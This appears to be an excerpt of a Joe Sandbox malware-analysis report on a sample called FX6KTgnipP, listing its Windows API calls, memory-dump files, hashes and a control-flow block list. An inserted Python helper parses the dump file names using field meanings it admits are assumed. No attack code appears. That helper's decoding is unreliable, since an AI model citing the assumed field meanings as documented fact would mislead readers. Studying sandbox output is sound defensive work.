• SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00279E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 0024E346
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0

APIs
  • Part of subcall function 002577CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,002473B8), ref: 002577E1
  • Part of subcall function 002577CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,002473B8), ref: 002577F5
• ReleaseSemaphore.KERNEL32(?,00000040,00000000,6294DA82,?,?,00000001,00000000,0027A603,000000FF,?,002590B9,?,?,00245630,?), ref: 0025752A
• CloseHandle.KERNELBASE(?,?,?,002590B9,?,?,00245630,?,?,?,00000000,?,?,?,00000001,?), ref: 00257544
• DeleteCriticalSection.KERNEL32(?,?,002590B9,?,?,00245630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 0025755D
• CloseHandle.KERNEL32(?,?,002590B9,?,?,00245630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00257569
• CloseHandle.KERNEL32(?,?,002590B9,?,?,00245630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00257575
  • Part of subcall function 002575ED: WaitForSingleObject.KERNEL32(?,000000FF,0025770A,?,?,0025777F,?,?,?,?,?,00257769), ref: 002575F3
  • Part of subcall function 002575ED: GetLastError.KERNEL32(?,?,0025777F,?,?,?,?,?,00257769), ref: 002575FF
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 1868215902-0

APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00260689
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0026069A
• IsDialogMessageW.USER32(000103E6,?), ref: 002606AE
• TranslateMessage.USER32(?), ref: 002606BC
• DispatchMessageW.USER32(?), ref: 002606C6
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0
                                                                                                                                                                            • Opcode ID: 1988ee07a4dccf442d72bfa619619627a33427c30e3eea0a15e203a99e065edc
                                                                                                                                                                            • Instruction ID: 01980ae7eb8ed89246f76a61b7ae85346c68365c2ff659aac733255d2cbfd2af
                                                                                                                                                                            • Opcode Fuzzy Hash: 1988ee07a4dccf442d72bfa619619627a33427c30e3eea0a15e203a99e065edc
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF0D0B192622AAB8B20AFE2FC4CDDB7FACEE452557004416F50AD2050E764D555CBB0
                                                                                                                                                                             Control-flow Graph (rendered graph image not recovered)
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00256C5E: __EH_prolog3_GS.LIBCMT ref: 00256C65
                                                                                                                                                                              • Part of subcall function 00256C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00256C9A
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0025F4ED
                                                                                                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0025F524
                                                                                                                                                                            • SHGetMalloc.SHELL32(0029532C), ref: 0025F52E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                                                                                                                                                            • String ID: riched20.dll
                                                                                                                                                                            • API String ID: 2446841611-3360196438
                                                                                                                                                                            • Opcode ID: 1e73802ccbf877735c7323ec7266357f331fa2013fc6da761aff9fd2da66912e
                                                                                                                                                                            • Instruction ID: 4b767052e4dc724114c4d91fec3b21d2c985c413c29d62c374ce0410052e7bc2
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e73802ccbf877735c7323ec7266357f331fa2013fc6da761aff9fd2da66912e
                                                                                                                                                                            • Instruction Fuzzy Hash: 78F044B1D10209ABCB10AFA9D84D9EEFBFCEF95301F00406AE805A2240DBB85605CFA0
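Every function entry above cites the same set of memory dumps by file name (Source File plus five Associated dumps). The following helper is an added example for triaging those names and is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. The meaning of the name fields is an assumption inferred from the names on this page: the fifth field carries 0x20 for the region at 0x241000 (where the disassembled code lives), 0x02 for the regions at 0x240000, 0x27C000 and 0x297000, and 0x04 for 0x289000 and 0x292000, and the seventh field is 0x01000000 for all of them, which matches the Windows PAGE_* protection and MEM_IMAGE constants. The remaining fields are left undecoded. The `rva()` helper maps an API `ref` address from the listings (for example OleInitialize at 0025F4ED) to an offset inside the image dumped at 0x240000.

```python
"""Triage helper for Joe Sandbox memory-dump (.sdmp) file names.

Added example, not part of the Joe Sandbox report. Field meanings are an
ASSUMPTION inferred from the names on this page: field 5 lines up with the
Windows PAGE_* protection constants and field 7 with MEM_IMAGE. Fields 2, 3,
6 and 8 are captured but deliberately not interpreted.
"""
import re
from dataclasses import dataclass

# Windows memory protection / type constants (winnt.h), used to decode fields 5 and 7.
PAGE_FLAGS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
MEM_IMAGE = 0x1000000
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80  # any PAGE_EXECUTE* protection

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\.(?P<f3>[0-9]+)\."
    r"(?P<addr>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class Dump:
    name: str
    process: int     # field 1 (assumed: sandbox process index)
    address: int     # field 4 (assumed: region base address)
    protect: int     # field 5 (assumed: PAGE_* protection)
    mem_type: int    # field 7 (assumed: MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE)

    @property
    def protect_name(self) -> str:
        base = PAGE_FLAGS.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")
        return base + ("|PAGE_GUARD" if self.protect & PAGE_GUARD else "")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def is_image(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_sdmp(name: str) -> Dump:
    """Split a .sdmp file name into its fields; raise ValueError if it does not fit the pattern."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a .sdmp name: {name!r}")
    return Dump(name=name.strip(), process=int(m["proc"], 16), address=int(m["addr"], 16),
                protect=int(m["protect"], 16), mem_type=int(m["mtype"], 16))


def executable_dumps(names):
    """The dumps worth loading into a disassembler: those with an executable protection."""
    return [d for d in map(parse_sdmp, names) if d.executable]


def rva(address: int, image_base: int) -> int:
    """Relative virtual address of an API 'ref' inside an image dumped at image_base."""
    if address < image_base:
        raise ValueError("address below image base")
    return address - image_base


# Names copied from this report's Memory Dump Source block (process 0, image based at 0x240000).
REPORT_DUMPS = [
    "00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for d in map(parse_sdmp, REPORT_DUMPS):
        kind = "MEM_IMAGE" if d.is_image else hex(d.mem_type)
        print(f"{d.address:08x}  {d.protect_name:<22} {kind}")
    # OleInitialize ref 0025F4ED from the listing above, as an RVA inside the 0x240000 image.
    print(hex(rva(0x25F4ED, 0x240000)))
```

Under these assumptions only the 0x241000 dump is executable, which is the one the disassembly listings (and the `hcaresult_0_2_240000_FX6KTgnipP.jbxd` IDA snapshot) are drawn from; the read-only and read-write dumps hold headers, .rdata and .data respectively. The RVA arithmetic is what you need to find a listed `ref` address in a dump loaded at a different base.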
                                                                                                                                                                             Control-flow Graph (function starting at 0024E948; rendered graph image not recovered, so the Executed / Not Executed colouring of blocks is lost)
                                                                                                                                                                             Basic blocks (id: address range, API or call, successors):
                                                                                                                                                                             • 1394: 24e948-24e961, call 2657d8 → 1397, 1398
                                                                                                                                                                             • 1397: 24e963-24e965 → 1399
                                                                                                                                                                             • 1398: 24e96a-24e974 → 1400, 1401
                                                                                                                                                                             • 1399: 24eaa6-24eaab, call 265787 (function exit)
                                                                                                                                                                             • 1400: 24e976-24e983, GetStdHandle → 1402
                                                                                                                                                                             • 1401: 24e988 → 1403
                                                                                                                                                                             • 1402: 24ea6f-24ea72 → 1403
                                                                                                                                                                             • 1403: 24e98b-24e998 → 1405, 1406
                                                                                                                                                                             • 1405: 24e9df-24e9f4, WriteFile → 1408
                                                                                                                                                                             • 1406: 24e99a-24e99e → 1409, 1410
                                                                                                                                                                             • 1408: 24e9f7-24e9f9 → 1410, 1411
                                                                                                                                                                             • 1409: 24e9a0-24e9ab → 1413, 1414
                                                                                                                                                                             • 1410: 24e9ff-24ea03 → 1411, 1412
                                                                                                                                                                             • 1411: 24ea9f-24eaa2 → 1399
                                                                                                                                                                             • 1412: 24ea09-24ea0d → 1411, 1415
                                                                                                                                                                             • 1413: 24e9ad → 1414
                                                                                                                                                                             • 1414: 24e9af-24e9ce, WriteFile → 1408, 1416
                                                                                                                                                                             • 1415: 24ea13-24ea25, call 249230 → 1420, 1421
                                                                                                                                                                             • 1416: 24e9d0-24e9db → 1409, 1418
                                                                                                                                                                             • 1418: 24e9dd → 1408
                                                                                                                                                                             • 1420: 24ea77-24ea9a, call 2414a7, call 249653, call 241a66 → 1411
                                                                                                                                                                             • 1421: 24ea27-24ea30 → 1403, 1423
                                                                                                                                                                             • 1423: 24ea36-24ea3a → 1403, 1425
                                                                                                                                                                             • 1425: 24ea40-24ea6c → 1402
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024E94F
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,0000002C,00252D28,?,?,?,?,00000000,0025ABB6,?,?,?,?,?,0025A80E,?), ref: 0024E978
                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0024E9BE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileH_prolog3_HandleWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2898186245-0
                                                                                                                                                                            • Opcode ID: 31602be66d700b5805f4bc69af49481d2ef8fdc4f201b174c1195df6e46cc9a1
                                                                                                                                                                            • Instruction ID: 4c13abe9e0ac40a4ac73e34c23715636f46439b51cd5a777d31afe9ec64e03ad
                                                                                                                                                                            • Opcode Fuzzy Hash: 31602be66d700b5805f4bc69af49481d2ef8fdc4f201b174c1195df6e46cc9a1
                                                                                                                                                                            • Instruction Fuzzy Hash: 5841AD35A21215EFEF18DF64D884BADBB7ABF84700F154118F801AB281CB759DA4CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024EFF6
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,0024EBA7,?,00000001,00000000,?,?,00000024,0024A4DE,?,00000001,?,?), ref: 0024F01F
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,0024EBA7,?,00000001,00000000,?,?,00000024,0024A4DE,?), ref: 0024F075
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000024,0024EBA7,?,00000001,00000000,?,?,00000024,0024A4DE,?,00000001,?,?,00000000), ref: 0024F0E3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3709856315-0
                                                                                                                                                                            • Opcode ID: 8fcfbe49472acad9c4aca46c017a8715c476230bd09e0bd7892bd19f431659b6
                                                                                                                                                                            • Instruction ID: dd750d2be38a52f5a882523d8f4e952d5705e7b6a68cad2bcabdbb9042a54b0b
                                                                                                                                                                            • Opcode Fuzzy Hash: 8fcfbe49472acad9c4aca46c017a8715c476230bd09e0bd7892bd19f431659b6
                                                                                                                                                                            • Instruction Fuzzy Hash: EE31B271920219DBDF58DFE4DA88AEEBBB8AFC8300F14542AE401E3251D77489A5CB71
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E029
                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E041
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E073
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E092
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2244327787-0
                                                                                                                                                                            • Opcode ID: 7c68f57e3071a13fa63b5d9e27374294ee482580979659cd27cba68c11f7a4de
                                                                                                                                                                            • Instruction ID: 5142abce6b45b3a47d64e64a72b095bb61c21297e27f9c5e60b51327e966aef9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7c68f57e3071a13fa63b5d9e27374294ee482580979659cd27cba68c11f7a4de
                                                                                                                                                                            • Instruction Fuzzy Hash: B511C230520209EBFF385F60D808B6E37A9FB51320F225629E436A5190C7F1DEA49B61
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0025FB52
                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,0029535C), ref: 0025FC24
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileH_prolog3_Operation_wcslen
                                                                                                                                                                            • String ID: \S)
                                                                                                                                                                            • API String ID: 3104323202-1237555261
                                                                                                                                                                            • Opcode ID: f6e9a25c67c903014de217dab9b4cca38e0b262f9ebfe2ec437e4b21e2fc6870
                                                                                                                                                                            • Instruction ID: cf9c208b34542bccae348ca8d07d4c0e44b5d79044dc2e3a2a4c6e855b221c9d
                                                                                                                                                                            • Opcode Fuzzy Hash: f6e9a25c67c903014de217dab9b4cca38e0b262f9ebfe2ec437e4b21e2fc6870
                                                                                                                                                                            • Instruction Fuzzy Hash: 51314771D20358DADB15DFE8C986ADDBBB4BF08315F54012EE419A7292D7700AA9CF14
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 0025764C
                                                                                                                                                                            • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,0024736D,00245AB0,?), ref: 00257693
                                                                                                                                                                              • Part of subcall function 002492EB: __EH_prolog3_GS.LIBCMT ref: 002492F2
                                                                                                                                                                              • Part of subcall function 00249500: __EH_prolog3_GS.LIBCMT ref: 00249507
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_Thread$CreatePriority
                                                                                                                                                                            • String ID: CreateThread failed
                                                                                                                                                                            • API String ID: 3138599208-3849766595
                                                                                                                                                                            • Opcode ID: 1427448bff5df7b70308bbee745a288e8f49190461c2ecb4a0eb48544300bfa0
                                                                                                                                                                            • Instruction ID: 94e0e31566999be4b17023b66388a8e679ee60a4c746f05b02e348bc40f670af
                                                                                                                                                                            • Opcode Fuzzy Hash: 1427448bff5df7b70308bbee745a288e8f49190461c2ecb4a0eb48544300bfa0
                                                                                                                                                                            • Instruction Fuzzy Hash: C301D6B53A97066FE7147F68FC85F62735CEB41711F20042DF945A6180CAF168A9877C
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 00263C82
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00263C99
                                                                                                                                                                              • Part of subcall function 00256A89: _wcslen.LIBCMT ref: 00256AA6
                                                                                                                                                                              • Part of subcall function 0024B03D: __EH_prolog3_GS.LIBCMT ref: 0024B044
                                                                                                                                                                              • Part of subcall function 0024B3E1: __EH_prolog3_GS.LIBCMT ref: 0024B3E8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                                                                                                                                                            • String ID: |Z)
                                                                                                                                                                            • API String ID: 1265872803-2689361300
                                                                                                                                                                            • Opcode ID: bf26b19c6c6bd406f5f98b055e491c4bb5917b38a33b7008602601c14a6141a5
                                                                                                                                                                            • Instruction ID: 93eb9a951090d310e5346a1c5dd38013e4c4a5d7f33c951d40246ac49a703bb9
                                                                                                                                                                            • Opcode Fuzzy Hash: bf26b19c6c6bd406f5f98b055e491c4bb5917b38a33b7008602601c14a6141a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 44110C35B315B09EDB07EB68AC25BDC7BB4AB16310F00419FE44897253CBB04AA4CFA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&$@U=u
                                                                                                                                                                            • API String ID: 1269201914-115409615
                                                                                                                                                                            • Opcode ID: c40e897fad9221d569e4944bbb56ab8fde4c66a4d9cd212462e2e29d773e447a
                                                                                                                                                                            • Instruction ID: 1b9e4a715a6b5b601901cf62e9e3f424479c827a3c02fa9b9eef7ea63d42d951
                                                                                                                                                                            • Opcode Fuzzy Hash: c40e897fad9221d569e4944bbb56ab8fde4c66a4d9cd212462e2e29d773e447a
                                                                                                                                                                            • Instruction Fuzzy Hash: 33B012952BE000BD330431103E03C37010CC2C2B10330451AF840C148298829EF10035
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&$gI&
                                                                                                                                                                            • API String ID: 1269201914-164455618
                                                                                                                                                                            • Opcode ID: 24973a6836019034ee59f5d3b94a382f4607139b8b44829715437f5c30e30073
                                                                                                                                                                            • Instruction ID: b4d1fb54a33771e8853a0dc9b94ef100b1196209c0e3e92c3f69305f79c918c5
                                                                                                                                                                            • Opcode Fuzzy Hash: 24973a6836019034ee59f5d3b94a382f4607139b8b44829715437f5c30e30073
                                                                                                                                                                            • Instruction Fuzzy Hash: 12B012852BE001AD330875143D03C37010CC2C3B10330C51AF844C2581D4808DF40131
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024DEA1
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,0024E8F5,?,?,0024A6B9,?,00000011,?), ref: 0024DF15
                                                                                                                                                                            • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,0024D303,?,?,?), ref: 0024DF65
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
